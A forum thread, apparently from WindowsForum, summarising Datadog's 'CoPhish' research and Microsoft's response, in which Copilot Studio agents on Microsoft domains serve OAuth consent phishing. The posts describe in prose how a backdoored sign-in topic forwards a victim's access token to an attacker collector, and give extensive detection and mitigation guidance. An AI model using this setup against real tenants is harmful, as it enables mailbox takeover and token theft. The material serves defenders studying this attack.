CoPhish: OAuth Token Theft Using Microsoft Copilot Studio

  • Thread Author
Microsoft’s Copilot Studio can be weaponized to steal OAuth tokens — an attack chain Datadog Security Labs has dubbed “CoPhish” — by hosting malicious agents on Microsoft domains and using the agents’ built‑in sign‑in workflows to deliver convincing OAuth consent prompts that exfiltrate tokens to attacker infrastructure.

A hand hovers a glowing code icon as Copilot Studio asks to access data on a laptop.Background​

Microsoft’s Copilot Studio and related agent tooling are designed to let organizations and individuals build low‑code AI assistants (agents) with customizable “topics” and a hosted demo page so others can try the agent. That convenience is also the attack surface CoPhish exploits: a malicious actor can create or configure an agent so its Login topic triggers an OAuth consent flow for an attacker‑controlled application and then immediately forward the resulting access token to a third‑party endpoint under the attacker’s control. Because the agent’s demo page is hosted on Microsoft infrastructure (copilotstudio.microsoft.com), the UI and domain look legitimate — increasing the chance victims will accept consent requests.
Datadog’s proof‑of‑concept shows how the agent’s topic automation can send the token directly from Microsoft infrastructure (not from the victim’s browser), hiding the exfiltration from outbound traffic logs and making detection by simple network monitoring difficult. The result: an attacker can obtain a bearer token that grants Microsoft Graph permissions the victim approved — for example Mail.ReadWrite or Notes.ReadWrite — and then act on behalf of the user through APIs or Copilot actions.

Why CoPhish matters: OAuth token theft, trust, and automation​

The core problem: delegated consent and trusted hosting​

OAuth is intentionally built to let users grant third‑party applications delegated access to their resources. That model depends on users being able to reason about what they’re consenting to and on governance rules that limit what non‑verified apps can request or what non‑administrators can approve.
CoPhish combines three high‑impact primitives:
  • A legitimate Microsoft domain hosting the lure (trusted appearance).
  • A standard OAuth consent flow that issues bearer tokens when users approve permissions.
  • Low‑code automation inside the agent that can forward tokens or immediately take actions using those tokens.
When these primitives are chained, attackers obtain tokens that are functionally equivalent to keys to the victim’s account — and because the flow uses Microsoft endpoints, simple indicators such as unusual outbound IPs from the victim’s device are absent.

The social‑engineering multiplier​

Visual trust is powerful: users are conditioned to trust known brands and domains. An agent demo page that looks like a first‑party Copilot UI on a Microsoft domain erodes common red flags (unknown domain, bad TLS, odd layout) and therefore dramatically increases the probability a user — even an administrator — will grant consent. Attack success is still social engineering at scale; but the trust anchor changes from “a convincing fake page” to “an apparently legitimate Microsoft page.”

Technical anatomy: step‑by‑step​

How an attacker sets up CoPhish​

  • Create (or compromise) a Copilot Studio agent in any Entra ID tenant with a Copilot Studio license or trial. The agent can be in the attacker’s tenant; cross‑tenant targeting is possible because the demo URL lives on Microsoft infrastructure.
  • Modify the agent’s Login topic (or other relevant automation topics) so that the sign‑in triggers an OAuth authorization request for an application that the attacker controls — requesting delegated scopes such as Mail.ReadWrite, Mail.Send, or Notes.ReadWrite.
  • Add an automation step that forwards the obtained token (for example, as an HTTP header or POST) to an attacker‑controlled endpoint (Burp Collaborator in the PoC). Because the request originates from Copilot Studio, it will originate from Microsoft’s IPs.
  • Distribute the agent’s demo URL (copilotstudio.microsoft.com/…) via phishing email, Teams message, or other lures. The victim clicks, sees the familiar UI, clicks Login, authorizes the application, and is unaware that the token has been forwarded.

What the stolen token allows​

  • Acting as the user via Microsoft Graph: read/write email, send messages, enumerate files, manage calendar invites.
  • Immediate automation from the agent itself: the agent can use the token to call Graph endpoints to fetch data, inject content, or create further lures (for example, phishing emails sent from the victim’s mailbox).
Decoding the token in Datadog’s POC showed Mail.Send and Mail.ReadWrite scopes, demonstrating the practical risk of lateral phishing or data exfiltration.

Who is at risk?​

High‑value targets​

  • Administrators with consent‑granting roles (Application Administrator, Cloud Application Administrator) are top targets because they can approve broader scopes and app permissions that end users cannot. If an admin consents, the attacker can request far more powerful scopes.
  • Regular users remain at risk where tenant consent policies still allow certain delegated scopes (for example Mail.ReadWrite) to be self‑consented by members. Those privileges are enough to read and send email, modify calendars, and escalate attacks internally.

Enterprise-wide exposure​

Because Copilot Studio demo pages are shareable and hosted under Microsoft domains, a targeted link can be distributed broadly (email, Teams, corporate forums), creating a low‑effort method for attackers to reach users inside a tenant while preserving the appearance of legitimacy.

Detection challenges and forensic footprints​

  • The exfiltration POSTs can originate from Microsoft IP ranges and will not necessarily show up as outbound connections from the victim’s device, defeating simple egress filtering or network IDS heuristics. Datadog’s PoC specifically demonstrates token forwarding from Microsoft infrastructure rather than the user’s browser.
  • Standard web proxies and EDRs that inspect user browser traffic will see the normal authentication flow to Microsoft endpoints, which looks legitimate, making it hard to flag the consent step as malicious.
  • The most reliable telemetry comes from Entra ID audit logs (application consent events, new service principal creation, unusual approvals), Copilot Studio admin logs (agent creation/modification), and Graph API call logs made under the user’s identity after consent.
Because of these constraints, defenders must correlate identity logs with Copilot Studio activity rather than relying on device network logs alone.

Vendor responses and policy shifts — what Microsoft has changed​

Microsoft has historically tightened self‑consent rules and Entra ID application consent defaults to reduce the risk of user‑consented elevation. Datadog’s analysis references Microsoft’s managed policy changes that further limit what regular users can consent to by default, and Microsoft has acknowledged the CoPhish disclosure and indicated product updates and governance changes are forthcoming. Independent reporting confirms Microsoft is investigating and planning mitigations.
However, important caveats remain:
  • Administrators retain the ability to grant consent to both internal and external unverified applications — a necessary operational capability that also creates an enduring attack surface if not tightly controlled.
  • Microsoft’s late‑October/November policy tweaks narrow user consent defaults, but they do not entirely remove the risk for privileged accounts or tenants where custom policies allow member consent to high‑risk scopes.
In short: Microsoft is acting, but governance and role hygiene inside tenant boundaries remain essential mitigations.

Practical mitigations — immediate, short‑term, and long‑term​

The defensive playbook for CoPhish and similar OAuth consent threats must be layered: governance, telemetry, user hardening, and incident response.

Immediate (hours — 48 hours)​

  • Restrict admin consent scope. Ensure only a minimal, vetted set of identities hold Application Administrator or Cloud Application Administrator roles. Require out‑of‑band approvals for new app consents.
  • Enable Microsoft-managed default consent policy or a stricter custom policy that blocks member consent for high‑risk Graph scopes (Mail.ReadWrite, Calendars.ReadWrite, Files.Read.All). Review and apply Microsoft’s updated consent defaults if available.
  • Block or monitor Copilot Studio demo links in high‑value workflows. Treat any copilotstudio.microsoft.com demo URL as suspicious until validated for important targets.
  • Require phishing‑resistant MFA for privileged users. Implement FIDO2 or platform passkeys for admins to reduce adversary-in‑the‑middle risk.

Short term (days — 2 weeks)​

  • Audit recently consented applications and service principals. Revoke suspicious or unnecessary consents. Re‑evaluate application permissions and limit them to least privilege.
  • Configure alerts for new Copilot agent creation, topic modifications, and demo URL generation in your tenant. Add monitoring for outbound POSTs from Copilot connector automation runs.
  • Harden app registration policies: forbid wildcard redirect URIs, restrict validDomains, and require verified publishers for apps requesting sensitive scopes.

Long term (weeks — months)​

  • Adopt a formal OAuth/consent governance program: periodic audits, justification for scopes, and approval workflows for any app requesting sensitive Graph permissions.
  • Expand telemetry to correlate Entra ID audit logs, Graph API activity, and Copilot Studio agent activity. Invest in SIEM rules that detect anomalous Graph calls by users who recently consented to new applications.
  • Engage suppliers and staff with targeted education: how to identify suspicious consent dialogs, and how to verify agent demo pages out‑of‑band before consenting. Practical drills can include simulated CoPhish scenarios to test readiness.

Detection and incident response playbook​

When you suspect a token compromise via CoPhish or similar OAuth consent phishing:
  • Revoke the token(s) and refresh tokens and force re‑authentication for the affected user (revokeSignInSessions). This severs the immediate attacker session.
  • Search Entra ID audit logs for the app consent event, service principal creation, and newly granted permissions. Record redirect URIs and publisher names.
  • Scan Graph activity for actions performed by the compromised identity (sent emails, created calendar events, files accessed). Prioritize containment where attackers used Mail.Send or Mail.ReadWrite to spread further lures.
  • Notify impacted users and rotate credentials for any service principals or application secrets that may have been exposed. While changing passwords alone is insufficient if refresh tokens were stolen, rotating app secrets and revoking tokens narrows the attacker’s window.

Critical analysis: strengths, vendor responsibility, and residual risks​

Strengths of the attack model​

  • CoPhish is elegant in its simplicity: it does not require a zero‑day or malware payload. Building a malicious agent, registering an app, and crafting a convincing consent flow are low‑cost operations with high potential impact. Datadog’s PoC demonstrates operational feasibility.
  • The use of Microsoft infrastructure to host the lure is a force multiplier for social engineering, exploiting user trust in domains and UI familiarities.

Microsoft’s position and responsibilities​

  • Microsoft can and is hardening consent defaults and the Copilot Studio governance model — actions that reduce the attack surface for non‑privileged accounts. Public reporting shows Microsoft acknowledged the issue and plans product updates. However, platform hardening must be paired with tenant‑level governance because administrators still retain consent power by design.

Residual risks and caveats​

  • Even with stricter defaults, privileged roles are an enduring risk; if an admin is socially engineered, an attacker can still obtain powerful tokens. That means role assignment, least privilege, and out‑of‑band approval remain critical.
  • The public record to date shows proof‑of‑concepts and confirmed platform weaknesses, but quantifying real‑world exploitation (how many tenants were compromised, how many admins were tricked) remains hard. Early reporting has not demonstrated widescale, confirmed production compromises specifically attributable to Copilot Studio abuse prior to disclosure; treat broad claims of mass compromise as plausible but unquantified until telemetry is published.

Recommendations for WindowsForum readers (practical, prioritized)​

  • If you’re an admin: Immediately audit who in your tenant can grant app consent. Apply the Microsoft‑managed consent defaults or a stricter custom policy. Enforce phishing‑resistant MFA (FIDO2) for all privileged roles. Add Copilot Studio demo URL monitoring to your email/Teams/content filtering.
  • If you’re a security engineer: Build SIEM detections for post‑consent Graph calls, new service principal creation events, and Copilot agent creation/modification events. Correlate these signals to detect post‑consent abuse faster.
  • If you’re an end user: Treat any consent dialog that requests broad access to your mailbox or files with suspicion. Validate the request out‑of‑band (e.g., ask the issuer via a separate verified channel) before consenting. If you see unexpected sent mail or calendar invites, report immediately.

Final assessment​

CoPhish is a clear reminder that as enterprise systems gain automation and low‑code extensibility, the attack surface shifts from purely technical vulnerabilities to governance and human trust. The technique described by Datadog is practical, leverages existing OAuth flows, and benefits from Microsoft hosting to increase social engineering success. Microsoft’s policy changes and commitments to product updates are necessary steps, but they are not a comprehensive fix for tenant governance gaps — especially where high‑privilege administrative consent remains a capability.
Defenders must treat Copilot Studio and other low‑code agent platforms as part of the identity threat surface: enforce least privilege, harden consent policies, monitor identity telemetry closely, and require phishing‑resistant authentication for privileged roles. These operational controls — combined with platform hardening by vendors — are the best means to reduce the risk that a friendly looking AI assistant becomes a silent token harvester.

This analysis synthesizes Datadog’s technical write‑up and independent reporting on the CoPhish technique, and it recommends prioritized, defensible mitigations administrators can apply today to reduce the odds of token theft via Copilot Studio agents.

Source: Techzine Global How attackers use Microsoft agents to steal OAuth tokens
 

Security teams are facing a fresh, elegant twist on OAuth phishing: researchers at Datadog Security Labs have documented a technique—dubbed CoPhish—that weaponizes Microsoft Copilot Studio agents to harvest OAuth tokens and persistent permissions by abusing legitimate Microsoft domains and low‑code automation flows.

Microsoft Copilot login screen beside a flow diagram of authentication tokens and an attacker.Background​

Microsoft Copilot Studio is a low‑code platform for creating and publishing AI assistants (agents). Agents can be published to a built‑in demo website hosted on copilotstudio.microsoft.com or embedded in other channels, and they support configurable authentication flows and automated topic logic. That flexibility makes Copilot Studio useful for defenders and attackers alike.
Datadog’s disclosure shows how a malicious or compromised agent can present a convincing sign‑in UI, redirect users into an OAuth consent flow, collect the resulting session token, and then quietly forward that token to an attacker‑controlled endpoint or use it in the agent’s automation pipeline. Because the agent runs on Microsoft infrastructure and uses Microsoft domains during the flow, the operation looks and behaves like a legitimate service—dramatically lowering user suspicion.
Microsoft has publicly acknowledged the problem and told reporters it is investigating and planning product updates to harden governance and consent experiences. Microsoft describes the technique as social engineering but says it will evaluate additional safeguards to reduce misuse.

Why CoPhish matters: the technical and operational risk​

This is not a classic credential harvest; it exploits OAuth and Entra ID consent mechanics. The core risk factors:
  • Token‑based access: OAuth access tokens grant API access (Microsoft Graph, mail, chat, calendars, files) without exposing passwords. A stolen token can provide persistent programmatic access until revoked or expired. Datadog demonstrated tokens returned with scopes such as Mail.ReadWrite, Mail.Send, Chat.ReadWrite, and Notes.ReadWrite.
  • Trusted domain abuse: The malicious agent is served from copilotstudio.microsoft.com (the legitimate Microsoft domain used for Copilot Studio demo sites). Users seeing a Microsoft URL are less likely to suspect phishing.
  • Low‑code automation exfiltration: Copilot Studio topics (automations) can be modified by agent authors. Datadog showed how the built‑in sign‑in topic can be backdoored to include an HTTP request that forwards the captured User.AccessToken variable to an attacker-controlled endpoint—triggering exfiltration from within Microsoft infrastructure. Because the request originates inside Microsoft’s systems, it may not appear in the user’s client network logs.
  • Two realistic attacker scenarios:
  • Scenario 1 — targeting ordinary tenant users: attackers trick a user who can consent to a set of delegated permissions permitted by the tenant’s default consent policy. That can still include sensitive scopes like mail, chat and calendars depending on tenant settings.
  • Scenario 2 — targeting administrators: users with Cloud Application Administrator / Application Administrator roles can grant broader permissions (including high‑risk and application permissions), enabling an attacker to gain powerful privileges across the tenant. Datadog emphasized administrators remain a high‑value target because default user consent policies do not restrict their ability to consent.
  • Traffic invisibility: Because authentication and the agent runtime involve Microsoft infrastructure (including the Bot Framework endpoint token.botframework.com during validation), some of the exchanges occur server‑side and won’t appear as outbound calls from the victim’s machine to an attacker domain—complicating detection. Datadog demonstrated use of the Bot Connection Validation step and server‑side token capture.

How the CoPhish workflow works — step by step​

  • Attacker builds or reuses a Copilot Studio agent in their own tenant (or a compromised tenant), configuring the agent’s Authentication → Authenticate manually settings to point at a malicious OAuth app (multi‑tenant app registration) with a reply URL that fits the Bot Framework redirect pattern.
  • The attacker tweaks the agent’s system sign‑in topic (a configurable automation triggered by sign‑in) to insert an HTTP Request action that sends the User.AccessToken to an external collector (for example, a Burp Collaborator URL used in Datadog’s lab). That HTTP request runs from Copilot Studio servers.
  • The agent is published to its demo website (copilotstudio.microsoft.com/…), giving the attacker a legitimate Microsoft URL to share with victims.
  • The attacker lures victims (via email, Teams, social engineering, SEO, or other distribution channels) to the demo site. The agent’s UI looks like a Microsoft Copilot dialog and includes a visible Login button.
  • When the victim clicks Login, the flow redirects to the malicious OAuth consent page. If the victim consents, Entra ID issues an access token and the Bot Framework validation step exchanges a code and displays a numeric validation token to the user—part of the normal Copilot sign‑in UX. The agent receives the User.AccessToken and the embedded HTTP request forwards it to the attacker.
This sequence means the user completes a plausible Microsoft sign‑in flow and is not shown (by default) any obvious indication that their token was relayed to an attacker.

Verification and independent confirmations​

Datadog published a detailed technical write‑up and proof‑of‑concept explanations showing the exact configuration, the reply URL pattern, and how the sign‑in topic can be backdoored.
Independent security outlets and industry press reviewed Datadog’s findings and corroborated the core technical narrative. Several publications quoted Microsoft confirming it had investigated and would address the issue through product updates while framing the technique as social engineering. That independent reporting aligns with Datadog’s lab description and Microsoft’s public response.
Caveat and caution: Datadog’s disclosure demonstrates the method in a lab and provides indicators and telemetry guidance. There are, at the time of reporting, no widely published cases of large‑scale active exploitation tied to CoPhish in the wild; this remains a proof‑of‑concept escalation path with clear real‑world risk. Where available, defenders should treat lab demonstrations as high‑priority, actionable intelligence because the attack depends on human consent rather than a remote code execution vulnerability.

Immediate mitigations: what security teams must do now​

The good news for defenders is most mitigations are operational controls already supported by Entra ID, Microsoft 365, and Copilot Studio; they require configuration and monitoring rather than waiting for a product patch.
  • Restrict user consent for application permissions
  • Set the tenant app consent policy so that end users cannot consent to high‑risk delegated permissions. Microsoft has been updating its Microsoft managed default consent policy—changes rolled out in mid‑2025 and further tightening was scheduled for late October 2025 to curtail consentable scopes for users. Administrators must verify their tenant’s effective consent policy and enforce admin consent for sensitive scopes.
  • Force admin approval for third‑party apps and block user app registration where appropriate
  • Disable or limit the default that allows Entra ID member users to register new applications. This closes the path where an attacker could create internal app registrations that users can mistakenly consent to.
  • Enforce Conditional Access and MFA for privileged roles and high‑risk actions
  • Apply Conditional Access policies requiring MFA for administrators and for any OAuth consent flows that involve high‑impact permissions. MFA reduces but does not eliminate the risk of token misuse, particularly when administrative consent is granted; conditional access can block risky sign‑ins from untrusted locations and device states.
  • Block or closely review published/shared Copilot Studio agents
  • Treat demo site links as sensitive: restrict who can publish agents to a demo website, centrally review and approve shared agents, and forbid public publication of internal agents. Use the Copilot Studio admin controls and channels settings to limit exposure.
  • Monitor and detect unusual app registrations, consent events, and Copilot Studio modifications
  • Configure SIEM and monitoring to alert on Entra ID audit activity such as Consent to application, new app registrations, addition of client secrets to rarely used applications, and application role grants. Monitor Copilot Studio audit events such as BotCreate, BotComponentUpdate, and BotUpdateOperation-BotAuthUpdate for unexpected agent creations or sign‑in topic edits. Microsoft documents the relevant audit logs and how to access them via Purview / Microsoft Entra.
  • Revoke suspicious tokens and app grants immediately
  • If a consent looks suspicious, revoke the app’s granted permissions via Entra ID (remove delegated permission grants and secrets, disable the app registration) and rotate any affected credentials. Use the Microsoft Entra activity log to find Consent to application events and remediate.
  • Harden admin workflows and least privilege
  • Reduce the set of users who can approve applications. Move to just‑in‑time elevation for roles and require dual control for admin consent where possible. Audit and remove unneeded privileged roles.

Detection and response playbook (detailed)​

  • Triage the alert
  • If you see a suspicious Consent to application event or an unexpected BotCreate/BotComponentUpdate event, collect the tenant ID, actor, timestamp, application ID, and the scopes requested. Microsoft’s audit logs and Datadog’s recommendations show which fields are important to capture.
  • Identify affected accounts & tokens
  • Query Microsoft Entra / Azure AD audit logs for Consent to application and cross‑reference with Microsoft 365 Audit and sign‑in logs. Identify which users consented and whether any of them are high‑privilege.
  • Revoke consents and disable the application registration
  • Use the Entra admin center or PowerShell to remove delegated permission grants and delete or disable the malicious app registration. If the app had a client secret, rotate secrets across impacted services.
  • Inspect Copilot Studio agents and topics
  • Search for recently created or modified agents, focusing on BotComponentUpdate entries where *.topic.Signin appears. Remove or quarantine suspicious agents and restore approved templates.
  • Hunt for lateral activity
  • Use Microsoft 365 and Graph telemetry to look for automated or unusual API calls made with the stolen scopes (e.g., Mail.Send spikes, mailbox reads, mass calendar exports). Prioritize accounts with Mail.ReadWrite and Chat.ReadWrite scopes.
  • Reassess tenant consent posture
  • Confirm app consent policies, disable user app creation if appropriate, and require admin consent for all high‑risk scopes. Microsoft’s Secure by Default updates and the managed consent policy should be reviewed and applied.
  • Communicate and train
  • Notify impacted users, rotate credentials if any passwords were exposed, and refresh targeted phishing training to include tactics that weaponize vendor‑hosted resources and trusted domains.

Product and platform implications — what Microsoft can/should do​

Datadog framed CoPhish as a social‑engineering exploitation of legitimate product features. That suggests mitigation can come from both policy changes and product hardening:
  • Harden default consent scope management so that demo or publicly shared agents cannot redirect to arbitrary OAuth consent workflows without additional approval or explicit admin gating.
  • Add automated checks to Copilot Studio publishing that flag unusual authentication templates (e.g., manual authentication templates that use multi‑tenant app registrations and the Bot Framework redirect) and require elevated approval before demo publication.
  • Surface clearer UI warnings when an agent asks for sign‑in that will grant third‑party or cross‑tenant permissions, and record transparent consent receipts that show where tokens will be used or forwarded.
  • Provide built‑in telemetry and sentinel templates tuned for BotCreate, BotComponentUpdate (especially on sign‑in topics) and sudden permission grants from non‑standard apps.
Microsoft has indicated it will work on product updates to reduce abuse of governance and consent experiences. In addition to product changes, Microsoft has already been tightening default tenant consent settings as part of its Secure by Default initiative—changes that reduce the surface for user‑consent attacks for many tenants if administrators adopt them.

Strengths of the research and remaining blind spots​

Notable strengths
  • Datadog’s analysis is technical and reproducible: it includes concrete configuration steps, payload examples, and log events to monitor—turning abstract concerns into actionable AD/tenant controls security teams can implement immediately.
  • The technique highlights a systemic problem: trusted domain + low‑code automation + OAuth is a powerful combination for social engineers, and documenting this helps defenders build detection and policy countermeasures.
Potential gaps and caveats
  • Demonstration vs. active exploitation: Datadog’s work is a responsibly disclosed lab demonstration. There is no public, verifiable evidence (at the time of reporting) that CoPhish is being widely used in ongoing campaigns; however, proof‑of‑concepts like this frequently accelerate adoption by opportunistic attackers if left unmitigated. That means defenders must assume the method will be attempted in the wild.
  • Dependency on human consent: Because the attack relies on users clicking Login and consenting, strong user awareness and UI improvements can reduce success rates, but determined attackers can still target high‑value administrators with personalized social engineering.
  • False‑positive risk in detection: Alerting on all Copilot Studio agent creations or sign‑in topic updates will generate noise in large organizations. Detection engineering must be tuned to spot anomalous patterns (unexpected owners, external app IDs, uncommon redirect targets, or secrets added to rarely used apps). Datadog and Microsoft logs provide the fields you need, but SOCs must invest in context enrichment.

Policy checklist for Microsoft 365 / Entra administrators​

  • Verify your tenant’s app consent policy and set Microsoft‑managed defaults or stricter custom rules that require admin consent for sensitive Graph scopes.
  • Disable user application registration unless explicitly needed.
  • Require Conditional Access + MFA for admin roles and enforce device compliance for sign‑ins.
  • Configure Purview / Microsoft 365 Audit log alerts for: Consent to application, BotCreate, BotComponentUpdate, and BotUpdateOperation-BotAuthUpdate.
  • Periodically review OAuth app registrations and permission grants (use automated certificates to detect rarely‑used apps receiving secrets or new credentials).
  • Lock down Copilot Studio publication: restrict who can publish agents to demo websites and require an internal approval workflow for any agent that requires authentication.

The bottom line​

CoPhish is a timely reminder that modern phishing is moving beyond spoofed domains and stolen passwords into the orchestration layers of cloud platforms and low‑code automation. By combining a legitimate, vendor‑hosted UI with an OAuth consent flow and internal automation, attackers can craft convincing, high‑value phishing experiences that hand them tokens instead of credentials.
The good news is that the primary mitigations are well known to identity and security teams: tighten app consent, restrict who can register or approve apps, enforce conditional access and MFA for privileged actions, and instrument audit logs to detect unusual consent or agent behavior. Datadog’s research provides precise telemetry fields and event names to monitor, and Microsoft’s platform already offers the controls and logging needed to detect and respond—if organizations prioritize these configurations now.
Treat Copilot Studio agents and their demo URLs as sensitive artifacts in your threat model, verify any external apps that request permissions, and assume that a well‑crafted social engineering campaign could try to weaponize trusted vendor infrastructure. Implement the steps in this article as part of a coordinated response plan to reduce risk quickly while waiting for product hardening from platform vendors.

Source: TechRadar Experts warn Microsoft Copilot Studio agents are being hijacked to steal OAuth tokens
 

Back
Top